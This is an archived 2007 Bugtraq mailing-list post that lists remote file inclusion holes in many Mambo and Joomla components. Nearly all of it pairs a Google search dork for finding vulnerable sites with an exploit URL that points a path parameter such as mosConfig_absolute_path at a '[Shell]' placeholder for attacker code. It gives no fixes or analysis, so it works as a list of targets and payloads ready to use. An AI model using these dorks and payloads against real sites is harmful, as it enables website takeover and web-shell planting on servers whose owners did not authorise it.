lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070622093626.24035.qmail@securityfocus.com>
Date: 22 Jun 2007 09:36:26 -0000
From: spymeta@...oo.com
To: bugtraq@...urityfocus.com
Subject: All Of the Mambo & Joomla Script Remote File Inclussion Bugs..

Hi every body...
There are some Remote File Inclussion bugs on Mamabo & Joomla Script...

You can search ;
ex: inurl:[Dork] , [dork], allinurl:[dork] on google or the other search sites..


Dork:

com_comprofiler

Expl:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=[Shell]



Dork:
inurl:com_multibanners

Expl:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:com_colophon

expl:
administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=[Shell]


Dork:

inurl:index.php?option=[Shell]com_simpleboard

Expl:
/components/com_simpleboard/file_upload.php?sbp=[Shell]

Dork:

inurl:"com_hashcash"


Expl:
/components/com_hashcash/server.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_htmlarea3_xtd-c"

Expl:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_sitemap"

Expl:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=[Shell]

--
Dork:
inurl:"com_forum"

Expl:
/components/com_forum/download.php?phpbb_root_path=[Shell]
--
Dork:
inurl:"com_pccookbook"

Expl:
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:index.php?option=[Shell]com_extcalendar

Expl:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"minibb"

Expl:
/components/minibb/index.php?absolute_path=[Shell]
-
Dork:
inurl:"com_smf"

Expl:
/components/com_smf/smf.php?mosConfig_absolute_path=[Shell]


Expl:
/modules/mod_calendar.php?absolute_path=[Shell]

Dork:
inurl:"com_pollxt"

Expl:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_loudmounth"

Expl:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_videodb"

Expl:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:index.php?option=[Shell]com_pcchess

Expl:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_multibanners"

Expl:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[Shell]


Dork:
inurl:"com_a6mambohelpdesk"

Expl:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=[Shell]

Dork:
inurl:"com_colophon"

Expl:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_mgm"

Expl:
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_mambatstaff"

Expl:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_securityimages"

Expl:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=[Shell]

Expl:
/components/com_securityimages/lang.php?mosConfig_absolute_path=[Shell]


Dork:
inurl:"com_artlinks"

Expl:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_galleria"

Expl:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=[Shell]

by SPYMETA

Mail & MSN : spymeta@...oo.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ